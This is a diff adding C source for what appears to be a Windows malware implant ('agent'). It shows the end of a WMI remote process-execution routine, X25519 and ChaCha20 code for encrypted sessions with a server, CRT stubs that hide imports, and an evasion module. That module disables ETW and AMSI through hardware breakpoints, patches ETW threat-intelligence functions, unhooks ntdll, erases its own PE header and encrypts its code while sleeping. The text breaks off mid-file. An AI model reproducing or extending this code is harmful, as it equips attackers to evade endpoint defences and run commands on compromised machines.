|| vPid.vt == VT_UI4) + ? (DWORD)vPid.intVal : 0; + VariantClear(&vRet); VariantClear(&vPid); + + if (ret_val == 0) { + snprintf(output_buf, output_size, + "[wmiexec] ok host=%s pid=%lu\n cmd=%s\n", + host, (unsigned long)pid_val, cmdline); + rc = 0; + } else { + snprintf(output_buf, output_size, + "[wmiexec] Win32_Process::Create returned %lu\n" + " 2=access denied 3=insufficient priv 8=unknown\n" + " 9=path not found 21=invalid param\n", + (unsigned long)ret_val); + } + } + +cleanup: + if (pOut) pOut->lpVtbl->Release(pOut); + if (pIn) pIn->lpVtbl->Release(pIn); + if (pInCls) pInCls->lpVtbl->Release(pInCls); + if (pClass) pClass->lpVtbl->Release(pClass); + if (pSvc) pSvc->lpVtbl->Release(pSvc); + if (pLoc) pLoc->lpVtbl->Release(pLoc); + if (bNS) SysFreeString(bNS); + if (bCls) SysFreeString(bCls); + if (bMeth) SysFreeString(bMeth); + if (co_init) CoUninitialize(); + return rc; +} diff --git a/agent/src/crypto/chacha.c b/agent/src/crypto/chacha.c new file mode 100644 index 0000000..0786e6b --- /dev/null +++ b/agent/src/crypto/chacha.c @@ -0,0 +1,191 @@ +#include "crypto.h" +#include +#include +#include +#include +#include +#include + +int crypto_rand_bytes(uint8_t *buf, size_t len) +{ + NTSTATUS st = BCryptGenRandom(NULL, buf, (ULONG)len, + BCRYPT_USE_SYSTEM_PREFERRED_RNG); + return (st == 0) ? 0 : -1; +} + +int crypto_init(crypto_ctx_t *ctx) +{ + memset(ctx, 0, sizeof(*ctx)); + return 0; +} + +void crypto_free(crypto_ctx_t *ctx) +{ + memset(ctx, 0, sizeof(*ctx)); +} + +/* ChaCha20-Poly1305 encrypt/decrypt */ + +int chacha20_poly1305_encrypt(const uint8_t *key, const uint8_t *nonce, + const uint8_t *pt, size_t pt_len, + uint8_t *ct, uint8_t *tag) +{ + mbedtls_chachapoly_context ctx; + mbedtls_chachapoly_init(&ctx); + int ret = mbedtls_chachapoly_setkey(&ctx, key); + if (ret == 0) + ret = mbedtls_chachapoly_encrypt_and_tag(&ctx, pt_len, nonce, + NULL, 0, + pt, ct, tag); + mbedtls_chachapoly_free(&ctx); + return ret; +} + +int chacha20_poly1305_decrypt(const uint8_t *key, const uint8_t *nonce, + const uint8_t *ct, size_t ct_len, + const uint8_t *tag, uint8_t *pt) +{ + mbedtls_chachapoly_context ctx; + mbedtls_chachapoly_init(&ctx); + int ret = mbedtls_chachapoly_setkey(&ctx, key); + if (ret == 0) + ret = mbedtls_chachapoly_auth_decrypt(&ctx, ct_len, nonce, + NULL, 0, + tag, ct, pt); + mbedtls_chachapoly_free(&ctx); + return ret; +} + +/* ---- Authenticated encryption with session key ---- */ + +uint8_t *crypto_seal(crypto_ctx_t *ctx, + const uint8_t *pt, size_t pt_len, + size_t *out_len) +{ + size_t total = CHACHA20_NONCE_SIZE + pt_len + POLY1305_TAG_SIZE; + uint8_t *buf = malloc(total); + if (!buf) + return NULL; + + uint8_t *nonce = buf; + uint8_t *ct = buf + CHACHA20_NONCE_SIZE; + uint8_t *tag = buf + CHACHA20_NONCE_SIZE + pt_len; + + /* unmask key, encrypt, re-randomize mask */ + uint8_t tmp_key[CHACHA20_KEY_SIZE]; + for (int i = 0; i < CHACHA20_KEY_SIZE; i++) + tmp_key[i] = ctx->session_key[i] ^ ctx->key_mask[i]; + + int enc_ok = (crypto_rand_bytes(nonce, CHACHA20_NONCE_SIZE) == 0) && + (chacha20_poly1305_encrypt(tmp_key, nonce, pt, pt_len, ct, tag) == 0); + + /* re-randomize mask after use */ + uint8_t new_mask[CHACHA20_KEY_SIZE]; + if (crypto_rand_bytes(new_mask, CHACHA20_KEY_SIZE) == 0) + { + for (int i = 0; i < CHACHA20_KEY_SIZE; i++) + { + ctx->session_key[i] = tmp_key[i] ^ new_mask[i]; + ctx->key_mask[i] = new_mask[i]; + } + } + memset(tmp_key, 0, sizeof(tmp_key)); + memset(new_mask, 0, sizeof(new_mask)); + + if (!enc_ok) + { + free(buf); + return NULL; + } + *out_len = total; + return buf; +} + +uint8_t *crypto_open(crypto_ctx_t *ctx, + const uint8_t *blob, size_t blob_len, + size_t *out_len) +{ + if (blob_len < CRYPTO_OVERHEAD) + return NULL; + + const uint8_t *nonce = blob; + size_t ct_len = blob_len - CRYPTO_OVERHEAD; + const uint8_t *ct = blob + CHACHA20_NONCE_SIZE; + const uint8_t *tag = blob + CHACHA20_NONCE_SIZE + ct_len; + + uint8_t *pt = malloc(ct_len + 1); + if (!pt) + return NULL; + + /* unmask key, decrypt, re-randomize mask */ + uint8_t tmp_key[CHACHA20_KEY_SIZE]; + for (int i = 0; i < CHACHA20_KEY_SIZE; i++) + tmp_key[i] = ctx->session_key[i] ^ ctx->key_mask[i]; + + int dec_ok = (chacha20_poly1305_decrypt(tmp_key, nonce, ct, ct_len, tag, pt) == 0); + + uint8_t new_mask[CHACHA20_KEY_SIZE]; + if (crypto_rand_bytes(new_mask, CHACHA20_KEY_SIZE) == 0) + { + for (int i = 0; i < CHACHA20_KEY_SIZE; i++) + { + ctx->session_key[i] = tmp_key[i] ^ new_mask[i]; + ctx->key_mask[i] = new_mask[i]; + } + } + memset(tmp_key, 0, sizeof(tmp_key)); + memset(new_mask, 0, sizeof(new_mask)); + + if (!dec_ok) + { + free(pt); + return NULL; + } + pt[ct_len] = '\0'; + *out_len = ct_len; + return pt; +} + +/* base64 encode/decode via mbedTLS */ + +char *base64_encode(const uint8_t *data, size_t len) +{ + size_t out_len = 0; + mbedtls_base64_encode(NULL, 0, &out_len, data, len); + + char *buf = malloc(out_len + 1); + if (!buf) + return NULL; + + if (mbedtls_base64_encode((unsigned char *)buf, out_len + 1, + &out_len, data, len) != 0) + { + free(buf); + return NULL; + } + buf[out_len] = '\0'; + return buf; +} + +uint8_t *base64_decode(const char *str, size_t *out_len) +{ + size_t in_len = strlen(str); + size_t decoded_len = 0; + + mbedtls_base64_decode(NULL, 0, &decoded_len, + (const unsigned char *)str, in_len); + + uint8_t *buf = malloc(decoded_len + 1); + if (!buf) + return NULL; + + if (mbedtls_base64_decode(buf, decoded_len + 1, &decoded_len, + (const unsigned char *)str, in_len) != 0) + { + free(buf); + return NULL; + } + buf[decoded_len] = '\0'; + *out_len = decoded_len; + return buf; +} diff --git a/agent/src/crypto/handshake.c b/agent/src/crypto/handshake.c new file mode 100644 index 0000000..c13f18c --- /dev/null +++ b/agent/src/crypto/handshake.c @@ -0,0 +1,161 @@ +#include "crypto.h" +#include +#include +#include +#include +#include + +/* shared CSPRNG defined in chacha.c */ +int crypto_rand_bytes(uint8_t *buf, size_t len); + +/* adapter for mbedTLS f_rng callbacks */ +static int _rng_cb(void *p_rng, unsigned char *buf, size_t len) +{ + (void)p_rng; + return crypto_rand_bytes(buf, len); +} + +/* generate an X25519 keypair */ + +int crypto_gen_keypair(uint8_t *pubkey, uint8_t *privkey) +{ + mbedtls_ecp_group grp; + mbedtls_mpi d; + mbedtls_ecp_point Q; + int ret; + + mbedtls_ecp_group_init(&grp); + mbedtls_mpi_init(&d); + mbedtls_ecp_point_init(&Q); + + ret = mbedtls_ecp_group_load(&grp, MBEDTLS_ECP_DP_CURVE25519); + if (ret) goto out; + + ret = mbedtls_ecp_gen_keypair(&grp, &d, &Q, _rng_cb, NULL); + if (ret) goto out; + + ret = mbedtls_mpi_write_binary(&d, privkey, X25519_KEY_SIZE); + if (ret) goto out; + + /* reverse public key bytes: mbedTLS is big-endian, X25519 wire is little-endian */ + ret = mbedtls_mpi_write_binary(&Q.MBEDTLS_PRIVATE(X), pubkey, X25519_KEY_SIZE); + if (ret == 0) { + for (int i = 0; i < X25519_KEY_SIZE / 2; i++) { + uint8_t tmp = pubkey[i]; + pubkey[i] = pubkey[X25519_KEY_SIZE - 1 - i]; + pubkey[X25519_KEY_SIZE - 1 - i] = tmp; + } + } + +out: + mbedtls_ecp_group_free(&grp); + mbedtls_mpi_free(&d); + mbedtls_ecp_point_free(&Q); + return ret; +} + +/* ECDH: compute shared = privkey * peer_pubkey */ + +int crypto_ecdh(const uint8_t *privkey, const uint8_t *peer_pubkey, + uint8_t *shared_secret) +{ + mbedtls_ecp_group grp; + mbedtls_mpi d; + mbedtls_ecp_point Qp, R; + int ret; + + mbedtls_ecp_group_init(&grp); + mbedtls_mpi_init(&d); + mbedtls_ecp_point_init(&Qp); + mbedtls_ecp_point_init(&R); + + ret = mbedtls_ecp_group_load(&grp, MBEDTLS_ECP_DP_CURVE25519); + if (ret) goto out; + + /* load private scalar */ + ret = mbedtls_mpi_read_binary(&d, privkey, X25519_KEY_SIZE); + if (ret) goto out; + + /* reverse peer pubkey bytes: little-endian wire -> big-endian MPI */ + uint8_t peer_le[X25519_KEY_SIZE]; + for (int i = 0; i < X25519_KEY_SIZE; i++) + peer_le[i] = peer_pubkey[X25519_KEY_SIZE - 1 - i]; + ret = mbedtls_mpi_read_binary(&Qp.MBEDTLS_PRIVATE(X), peer_le, X25519_KEY_SIZE); + if (ret) goto out; + + /* Z = 1 for affine representation */ + ret = mbedtls_mpi_lset(&Qp.MBEDTLS_PRIVATE(Z), 1); + if (ret) goto out; + + /* R = d * Qp */ + ret = mbedtls_ecp_mul(&grp, &R, &d, &Qp, _rng_cb, NULL); + if (ret) goto out; + + /* shared secret = R.X, reversed to little-endian */ + ret = mbedtls_mpi_write_binary(&R.MBEDTLS_PRIVATE(X), shared_secret, X25519_KEY_SIZE); + if (ret == 0) { + for (int i = 0; i < X25519_KEY_SIZE / 2; i++) { + uint8_t tmp = shared_secret[i]; + shared_secret[i] = shared_secret[X25519_KEY_SIZE - 1 - i]; + shared_secret[X25519_KEY_SIZE - 1 - i] = tmp; + } + } + +out: + mbedtls_ecp_group_free(&grp); + mbedtls_mpi_free(&d); + mbedtls_ecp_point_free(&Qp); + mbedtls_ecp_point_free(&R); + return ret; +} + +/* HKDF-SHA256 key derivation */ + +int crypto_hkdf(const uint8_t *ikm, size_t ikm_len, + const uint8_t *salt, size_t salt_len, + const uint8_t *info, size_t info_len, + uint8_t *okm, size_t okm_len) +{ + const mbedtls_md_info_t *md = mbedtls_md_info_from_type(MBEDTLS_MD_SHA256); + return mbedtls_hkdf(md, + salt, salt_len, + ikm, ikm_len, + info, info_len, + okm, okm_len); +} + +/* ECDH + HKDF to establish session key */ + +int crypto_do_handshake(crypto_ctx_t *ctx, const uint8_t *server_pubkey) +{ + uint8_t shared[X25519_KEY_SIZE]; + int ret; + + ret = crypto_ecdh(ctx->agent_privkey, server_pubkey, shared); + if (ret) return ret; + + /* HKDF info context label, stored as bytes to avoid string extraction */ + static const uint8_t k_info[] = { + 0x6b,0x64,0x66,0x2d,0x73,0x65,0x73,0x73, + 0x2d,0x76,0x31,0x00 + }; + + /* derive session key */ + uint8_t raw_key[CHACHA20_KEY_SIZE]; + ret = crypto_hkdf(shared, sizeof(shared), + NULL, 0, + k_info, sizeof(k_info) - 1, + raw_key, CHACHA20_KEY_SIZE); + + memset(shared, 0, sizeof(shared)); + + if (ret == 0) { + /* store key XOR random mask so it's never plaintext on the heap */ + crypto_rand_bytes(ctx->key_mask, CHACHA20_KEY_SIZE); + for (int i = 0; i < CHACHA20_KEY_SIZE; i++) + ctx->session_key[i] = raw_key[i] ^ ctx->key_mask[i]; + ctx->key_established = 1; + } + memset(raw_key, 0, sizeof(raw_key)); + return ret; +} diff --git a/agent/src/entry.c b/agent/src/entry.c new file mode 100644 index 0000000..ac1ce32 --- /dev/null +++ b/agent/src/entry.c @@ -0,0 +1,80 @@ +#include +#include +#include + +/* Forward declaration — defined in main.c */ +extern int WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int); + +void WinMainCRTStartup(void) +{ + int ret = WinMain(NULL, NULL, NULL, SW_SHOWDEFAULT); + ExitProcess((UINT)ret); +} + +/* Stubs for CRT functions that -nostartfiles leaves undefined */ + +/* atexit: called by libmingwex dtoa/snprintf internals; we ExitProcess so + * registered handlers will never run — stub is safe. */ +int atexit(void (*fn)(void)) { (void)fn; return 0; } + +/* __main: called by some MinGW ctor chains; no C++ ctors in this binary. */ +void __main(void) {} + +/* + * getntptimeofday — normally defined in libmingwex gettimeofday.o, which calls + * GetModuleHandleA("kernel32") + GetProcAddress to probe GetSystemTimePreciseAsFileTime. + * Our version uses GetSystemTimeAsFileTime directly (already in IAT) — eliminates + * the GetModuleHandleA import that gettimeofday.o would add. + */ +#include +int getntptimeofday(struct timespec *tp, const void *tz) +{ + (void)tz; + if (tp) { + FILETIME ft; + GetSystemTimeAsFileTime(&ft); + ULONGLONG t = ((ULONGLONG)ft.dwHighDateTime << 32) | ft.dwLowDateTime; + t -= 116444736000000000ULL; /* FILETIME to Unix epoch (100ns units) */ + tp->tv_sec = (time_t)(t / 10000000ULL); + tp->tv_nsec = (long)((t % 10000000ULL) * 100); + } + return 0; +} + +/* + * rand_s / __imp_rand_s stubs — prevent libmsvcrt.a(rand_s.o) from linking. + * rand_s.o imports GetModuleHandleA+GetProcAddress to find RtlGenRandom. + * libmingwex stack_chk_guard.o (pulled by mbedTLS) references __imp_rand_s. + * Defining both here satisfies the reference without the GetModuleHandleA dep. + */ +static errno_t _rand_s_impl(unsigned int *r) +{ + if (!r) return EINVAL; + BCryptGenRandom(NULL, (PUCHAR)r, sizeof(*r), BCRYPT_USE_SYSTEM_PREFERRED_RNG); + return 0; +} +errno_t rand_s(unsigned int *r) { return _rand_s_impl(r); } +errno_t (*__imp_rand_s)(unsigned int *) = _rand_s_impl; + +/* + * _gmtime64_s stub — mbedTLS platform_util.c.obj calls _gmtime64_s which is + * provided by libmsvcrt.a(_gmtime64_s.o), another GetModuleHandleA importer. + * Stub with gmtime() (same semantics, no GetModuleHandleA). + */ +#include +errno_t _gmtime64_s(struct tm *_Tm, const __int64 *_Time) +{ + if (!_Tm || !_Time) return EINVAL; + time_t t = (time_t)*_Time; + struct tm *r = gmtime(&t); + if (!r) return EINVAL; + *_Tm = *r; + return 0; +} +errno_t (*__imp__gmtime64_s)(struct tm *, const __int64 *) = _gmtime64_s; + +/* Override __imp_GetModuleHandleA — strong data symbol prevents IAT import. + * Library callers (libpthread misc.o etc.) use result for optional feature + * detection; returning NULL causes them to use built-in fallbacks. */ +static HMODULE WINAPI _gmha_impl(LPCSTR n) { (void)n; return NULL; } +HMODULE (WINAPI *__imp_GetModuleHandleA)(LPCSTR) = _gmha_impl; diff --git a/agent/src/evasion/evasion.c b/agent/src/evasion/evasion.c new file mode 100644 index 0000000..08ab699 --- /dev/null +++ b/agent/src/evasion/evasion.c @@ -0,0 +1,601 @@ +#include "evasion.h" +#include "evs_strings.h" +#include "peb_walk.h" +#include +#include +#include +#include +#include + +/* NtProtectVirtualMemory direct call */ +typedef NTSTATUS (NTAPI *NtPVM_t)(HANDLE, PVOID *, PSIZE_T, ULONG, PULONG); + +static BOOL _nt_prot(LPVOID addr, SIZE_T sz, DWORD prot, DWORD *old) +{ + static NtPVM_t _fn = NULL; + if (!_fn) { + char ns[12], fs[24]; + EVS_D(ns, EVS_dll_ntdll); + HMODULE h = _peb_module(ns); + SecureZeroMemory(ns, sizeof(ns)); + if (h) { + EVS_D(fs, EVS_fn_NtProtectVirtualMemory); + _fn = (NtPVM_t)(void *)GetProcAddress(h, fs); + SecureZeroMemory(fs, sizeof(fs)); + } + } + if (!_fn) return FALSE; + PVOID base = addr; + SIZE_T rsz = sz; + ULONG _old = 0; + NTSTATUS st = _fn((HANDLE)(LONG_PTR)-1, &base, &rsz, (ULONG)prot, &_old); + if (old) *old = (DWORD)_old; + return st == 0; +} + +/* Dynamic kernel32 API resolvers */ +typedef BOOL (WINAPI *GTC_t)(HANDLE, PCONTEXT); +typedef BOOL (WINAPI *STC_t)(HANDLE, const CONTEXT *); +typedef LPVOID (WINAPI *MVF_t)(HANDLE, DWORD, DWORD, DWORD, DWORD); +typedef BOOL (WINAPI *UMVF_t)(LPCVOID); + +static HMODULE _k32(void) +{ + static HMODULE h = NULL; + if (h) return h; + char s[16]; EVS_D(s, EVS_dll_kernel32); + h = _peb_module(s); + SecureZeroMemory(s, sizeof(s)); + return h; +} + +#define _K32_LAZY(type, var, enc_arr) \ + static type var = NULL; \ + if (!var) { char _fs[20]; EVS_D(_fs, enc_arr); \ + var = (type)(void *)GetProcAddress(_k32(), _fs); \ + SecureZeroMemory(_fs, sizeof(_fs)); } + +static BOOL _gtc(HANDLE t, PCONTEXT c) +{ + _K32_LAZY(GTC_t, fn, EVS_fn_GetThreadContext) + return fn ? fn(t, c) : FALSE; +} + +static BOOL _stc(HANDLE t, const CONTEXT *c) +{ + _K32_LAZY(STC_t, fn, EVS_fn_SetThreadContext) + return fn ? fn(t, c) : FALSE; +} + +static LPVOID _mvf(HANDLE hm, DWORD acc, DWORD hi, DWORD lo, DWORD sz) +{ + _K32_LAZY(MVF_t, fn, EVS_fn_MapViewOfFile) + return fn ? fn(hm, acc, hi, lo, sz) : NULL; +} + +static BOOL _umvf(LPCVOID p) +{ + _K32_LAZY(UMVF_t, fn, EVS_fn_UnmapViewOfFile) + return fn ? fn(p) : FALSE; +} + +static LPVOID g_etw_fn = NULL; +static LPVOID g_amsi_fn = NULL; /* AmsiScanBuffer — Dr1 */ +static LPVOID g_amsi_scan_fn = NULL; /* AmsiScanString — Dr2 */ +static HANDLE g_veh = NULL; +static BOOL g_init_done = FALSE; + +typedef PVOID (WINAPI *_AVEH_t)(ULONG, PVECTORED_EXCEPTION_HANDLER); +static PVOID _aveh(ULONG first, PVECTORED_EXCEPTION_HANDLER fn) +{ + static _AVEH_t _fn = NULL; + if (!_fn) { + char s[32] = {0}; + char sk[16] = {0}; + EVS_D(s, EVS_fn_AddVectoredExceptionHandler); + EVS_D(sk, EVS_dll_kernel32); + HMODULE h = _peb_module(sk); + if (h) _fn = (_AVEH_t)(void *)GetProcAddress(h, s); + SecureZeroMemory(s, sizeof(s)); + SecureZeroMemory(sk, sizeof(sk)); + } + return _fn ? _fn(first, fn) : NULL; +} + +/* Resolve ETW/AMSI targets */ + +static void _resolve_targets(void) +{ + char s[24]; + + /* ETW */ + EVS_D(s, EVS_dll_ntdll); + HMODULE ntdll = _peb_module(s); + SecureZeroMemory(s, sizeof(s)); + if (ntdll) { + EVS_D(s, EVS_fn_EtwEventWrite); + g_etw_fn = (LPVOID)GetProcAddress(ntdll, s); + SecureZeroMemory(s, sizeof(s)); + } + + /* AMSI — may not be present on all systems */ + EVS_D(s, EVS_dll_amsi); + HMODULE hamsi = _peb_module(s); /* only if already mapped */ + SecureZeroMemory(s, sizeof(s)); + if (hamsi) { + EVS_D(s, EVS_fn_AmsiScanBuffer); + g_amsi_fn = (LPVOID)GetProcAddress(hamsi, s); + SecureZeroMemory(s, sizeof(s)); + EVS_D(s, EVS_fn_AmsiScanString); + g_amsi_scan_fn = (LPVOID)GetProcAddress(hamsi, s); + SecureZeroMemory(s, sizeof(s)); + } +} + +/* VEH handler for ETW/AMSI */ +__attribute__((section(".run"), noinline)) +static LONG WINAPI _hwbp_veh(EXCEPTION_POINTERS *ep) +{ + if (ep->ExceptionRecord->ExceptionCode != EXCEPTION_SINGLE_STEP) + return EXCEPTION_CONTINUE_SEARCH; + + CONTEXT *ctx = ep->ContextRecord; + BOOL handled = FALSE; + + if (g_etw_fn && (LPVOID)(uintptr_t)ctx->Rip == g_etw_fn) { + ctx->Rax = 0; /* STATUS_SUCCESS */ + ctx->Rip = *(DWORD64 *)(uintptr_t)ctx->Rsp; + ctx->Rsp += 8; + ctx->Dr6 &= ~(DWORD64)0x1; /* clear B0 */ + handled = TRUE; + } + + if (g_amsi_fn && (LPVOID)(uintptr_t)ctx->Rip == g_amsi_fn) { + ctx->Rax = 0x80070057; /* E_INVALIDARG */ + ctx->Rip = *(DWORD64 *)(uintptr_t)ctx->Rsp; + ctx->Rsp += 8; + ctx->Dr6 &= ~(DWORD64)0x2; /* clear B1 */ + handled = TRUE; + } + + if (g_amsi_scan_fn && (LPVOID)(uintptr_t)ctx->Rip == g_amsi_scan_fn) { + ctx->Rax = 0x80070057; /* E_INVALIDARG */ + ctx->Rip = *(DWORD64 *)(uintptr_t)ctx->Rsp; + ctx->Rsp += 8; + ctx->Dr6 &= ~(DWORD64)0x4; /* clear B2 */ + handled = TRUE; + } + + return handled ? EXCEPTION_CONTINUE_EXECUTION : EXCEPTION_CONTINUE_SEARCH; +} + +/* Set debug registers on a thread */ +BOOL evasion_apply_thread(HANDLE hThread) +{ + if (!g_etw_fn && !g_amsi_fn && !g_amsi_scan_fn) return FALSE; + + CONTEXT ctx; + ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS; + if (!_gtc(hThread, &ctx)) return FALSE; + + if (g_etw_fn) ctx.Dr0 = (DWORD64)(uintptr_t)g_etw_fn; + if (g_amsi_fn) ctx.Dr1 = (DWORD64)(uintptr_t)g_amsi_fn; + if (g_amsi_scan_fn) ctx.Dr2 = (DWORD64)(uintptr_t)g_amsi_scan_fn; + + ctx.Dr7 &= ~(DWORD64)0x0FFF0015; + ctx.Dr7 |= g_etw_fn ? 0x01 : 0; + ctx.Dr7 |= g_amsi_fn ? 0x04 : 0; + ctx.Dr7 |= g_amsi_scan_fn ? 0x10 : 0; + + return _stc(hThread, &ctx) != 0; +} + +/* One-time init */ + +static void _evasion_init(void) +{ + if (g_init_done) return; + g_init_done = TRUE; + + _resolve_targets(); + + if (!g_etw_fn && !g_amsi_fn) return; + + /* register VEH, first in chain */ + if (!g_veh) + g_veh = _aveh(1, _hwbp_veh); + + /* arm breakpoints on calling thread */ + evasion_apply_thread(GetCurrentThread()); +} + +/* public API */ + +void evasion_patch_etw(void) { _evasion_init(); } +void evasion_patch_amsi(void) { _evasion_init(); } + +/* Patch ETW TI functions in ntdll */ +void evasion_patch_etw_ti(void) +{ + char s[32]; + EVS_D(s, EVS_dll_ntdll); + HMODULE ntdll = _peb_module(s); + SecureZeroMemory(s, sizeof(s)); + if (!ntdll) return; + + const struct { const unsigned char *enc; size_t n; } fns[] = { + { EVS_fn_EtwTiLogOpenProcess, sizeof(EVS_fn_EtwTiLogOpenProcess) }, + { EVS_fn_EtwTiLogReadWriteVm, sizeof(EVS_fn_EtwTiLogReadWriteVm) }, + { EVS_fn_EtwTiLogDuplicateHandle, sizeof(EVS_fn_EtwTiLogDuplicateHandle) }, + }; + + for (int i = 0; i < 3; i++) { + _evs_dec(s, fns[i].enc, fns[i].n); + BYTE *fn = (BYTE *)(void *)GetProcAddress(ntdll, s); + SecureZeroMemory(s, sizeof(s)); + if (!fn) continue; + + DWORD old; + if (!_nt_prot(fn, 1, PAGE_EXECUTE_READWRITE, &old)) continue; + *fn = 0xC3; + _nt_prot(fn, 1, old, &old); + } +} + +/* Restore ntdll from disk */ + +void evasion_unhook_ntdll(void) +{ + /* Build ntdll.dll path: GetSystemDirectoryW + "\ntdll.dll" */ + WCHAR path[MAX_PATH]; + UINT dir_len = GetSystemDirectoryW(path, MAX_PATH); + if (!dir_len || dir_len > MAX_PATH - 12) return; + + /* append \ntdll.dll as wide chars */ + const WCHAR suffix[] = { L'\\',L'n',L't',L'd',L'l',L'l',L'.',L'd',L'l',L'l',L'\0' }; + wcsncpy(path + dir_len, suffix, 11); + + /* map ntdll from disk via SEC_IMAGE to bypass file hooks */ + HANDLE hFile = CreateFileW(path, GENERIC_READ, FILE_SHARE_READ, + NULL, OPEN_EXISTING, 0, NULL); + if (hFile == INVALID_HANDLE_VALUE) return; + + HANDLE hMap = CreateFileMappingW(hFile, NULL, + PAGE_READONLY | SEC_IMAGE, 0, 0, NULL); + CloseHandle(hFile); + if (!hMap) return; + + LPVOID disk = _mvf(hMap, FILE_MAP_READ, 0, 0, 0); + CloseHandle(hMap); + if (!disk) return; + + /* get live ntdll base */ + char sname[12]; + EVS_D(sname, EVS_dll_ntdll); + HMODULE live = _peb_module(sname); + SecureZeroMemory(sname, sizeof(sname)); + if (!live) goto cleanup; + + /* parse PE headers to find .text section */ + IMAGE_DOS_HEADER *dos = (IMAGE_DOS_HEADER *)disk; + if (dos->e_magic != IMAGE_DOS_SIGNATURE) goto cleanup; + IMAGE_NT_HEADERS *nt = (IMAGE_NT_HEADERS *)((BYTE *)disk + dos->e_lfanew); + if (nt->Signature != IMAGE_NT_SIGNATURE) goto cleanup; + + IMAGE_SECTION_HEADER *sec = IMAGE_FIRST_SECTION(nt); + for (WORD i = 0; i < nt->FileHeader.NumberOfSections; i++, sec++) { + if (memcmp(sec->Name, ".text", 5) != 0) continue; + + LPVOID live_text = (BYTE *)live + sec->VirtualAddress; + LPVOID disk_text = (BYTE *)disk + sec->VirtualAddress; + SIZE_T text_sz = sec->Misc.VirtualSize; + + DWORD old; + if (!_nt_prot(live_text, text_sz, PAGE_EXECUTE_READWRITE, &old)) + break; + memcpy(live_text, disk_text, text_sz); + _nt_prot(live_text, text_sz, old, &old); + break; + } + +cleanup: + _umvf(disk); +} + +/* Remove the PE header at module base */ +void evasion_stomp_header(void) +{ + HMODULE base = (HMODULE)_peb_self_base(); + if (!base) return; + DWORD old; + if (!_nt_prot(base, 0x1000, PAGE_READWRITE, &old)) return; + SecureZeroMemory(base, 0x1000); + _nt_prot(base, 0x1000, old, &old); +} + +/* Sleep obfuscation */ + +/* Typedefs for dynamically resolved APIs */ + +typedef NTSTATUS (NTAPI *NtContinue_t)(PCONTEXT, BOOLEAN); +typedef NTSTATUS (NTAPI *NtWait_t)(HANDLE, BOOLEAN, PLARGE_INTEGER); +typedef VOID (NTAPI *RtlCapCtx_t)(PCONTEXT); +typedef BOOL (WINAPI *VProt_t) (LPVOID, SIZE_T, DWORD, PDWORD); +typedef void (WINAPI *Sleep_t) (DWORD); +typedef BOOL (WINAPI *SetEvent_t) (HANDLE); + +#define FAKE_STACK_SZ 0x10000 /* 64KB virtual stack for fake context */ + +typedef struct { + LPVOID text_base; + SIZE_T text_size; + BYTE key[32]; + DWORD sleep_ms; + HANDLE done; + NtContinue_t ntcontinue; + LARGE_INTEGER timeout; /* negative relative timeout */ + LPVOID fake_stack_mem; /* VirtualAlloc'd fake stack */ + PVOID orig_stack_base; /* TEB StackBase to restore */ + PVOID orig_stack_limit; /* TEB StackLimit to restore */ + VProt_t fn_vprot; /* direct kernel32 VA, not IAT thunk */ + Sleep_t fn_sleep; /* direct kernel32 VA, not IAT thunk */ + SetEvent_t fn_setevent; /* direct kernel32 VA, not IAT thunk */ +} obf_ctx_t; + +/* Read/write TEB fields via GS */ +__attribute__((section(".run"))) +static inline PVOID _teb_read_ptr(DWORD64 off) { + PVOID v; + __asm__ __volatile__("movq %%gs:(%1), %0" : "=r"(v) : "r"(off)); + return v; +} +__attribute__((section(".run"))) +static inline void _teb_write_ptr(DWORD64 off, PVOID val) { + __asm__ __volatile__("movq %0, %%gs:(%1)" :: "r"(val), "r"(off) : "memory"); +} + +/* Globals used from .noscan */ +static CONTEXT s_saved_ctx = {0}; +static obf_ctx_t *s_obf_ctx = NULL; +static volatile LONG s_restore = 0; + +/* .noscan data */ + +__attribute__((section(".run"), noinline)) +static DWORD WINAPI _timer_thread(LPVOID arg) +{ + obf_ctx_t *c = (obf_ctx_t *)arg; + /* use direct pointers, IAT thunks in .text are NOACCESS during sleep */ + c->fn_sleep(c->sleep_ms); + c->fn_setevent(c->done); + return 0; +} + +/* Wake up and restore state */ +__attribute__((section(".run"), noinline)) +static void _sleep_trampoline(void) +{ + obf_ctx_t *c = s_obf_ctx; + BYTE *p = (BYTE *)c->text_base; + SIZE_T n = c->text_size; + DWORD old; + + /* use fn_vprot directly, not IAT thunk (which is in PAGE_NOACCESS .text) */ + c->fn_vprot(p, n, PAGE_READWRITE, &old); + for (SIZE_T i = 0; i < n; i++) p[i] ^= c->key[i & 31]; + /* try XR first; fall back to XRW for ACG-enforced systems */ + if (!c->fn_vprot(p, n, PAGE_EXECUTE_READ, &old)) + c->fn_vprot(p, n, PAGE_EXECUTE_READWRITE, &old); + + /* restore TEB stack bounds */ + _teb_write_ptr(0x08, c->orig_stack_base); + _teb_write_ptr(0x10, c->orig_stack_limit); + + c->ntcontinue(&s_saved_ctx, FALSE); + __builtin_unreachable(); +} + +/* Encrypt text and switch to fake context */ +__attribute__((section(".run"), noinline)) +static void _obf_sleep_tail(obf_ctx_t *ctx, CONTEXT *fake_ctx_ptr) +{ + BYTE *p = (BYTE *)ctx->text_base; + SIZE_T n = ctx->text_size; + DWORD old; + + for (SIZE_T i = 0; i < n; i++) p[i] ^= ctx->key[i & 31]; + ctx->fn_vprot(p, n, PAGE_NOACCESS, &old); + + /* update TEB stack bounds for fake stack */ + _teb_write_ptr(0x08, (PVOID)((BYTE *)ctx->fake_stack_mem + FAKE_STACK_SZ)); + _teb_write_ptr(0x10, ctx->fake_stack_mem); + + ctx->ntcontinue(fake_ctx_ptr, FALSE); + __builtin_unreachable(); +} + +static void _find_section(const char *name, LPVOID *base, SIZE_T *sz) +{ + *base = NULL; *sz = 0; + BYTE *img = (BYTE *)_peb_self_base(); + if (!img) return; + IMAGE_DOS_HEADER *dos = (IMAGE_DOS_HEADER *)img; + if (dos->e_magic != IMAGE_DOS_SIGNATURE) return; + IMAGE_NT_HEADERS *nt = (IMAGE_NT_HEADERS *)(img + dos->e_lfanew); + if (nt->Signature != IMAGE_NT_SIGNATURE) return; + IMAGE_SECTION_HEADER *sec = IMAGE_FIRST_SECTION(nt); + for (WORD i = 0; i < nt->FileHeader.NumberOfSections; i++, sec++) { + int ok = 1; + for (int j = 0; j < 8; j++) { + char c = name[j]; + if (sec->Name[j] != (unsigned char)c) { ok = 0; break; } + if (!c) break; + } + if (ok) { *base = img + sec->VirtualAddress; *sz = sec->Misc.VirtualSize; return; } + } +} + +#define _XDEC(enc, dst) EVS_D((dst), (enc)) + +void 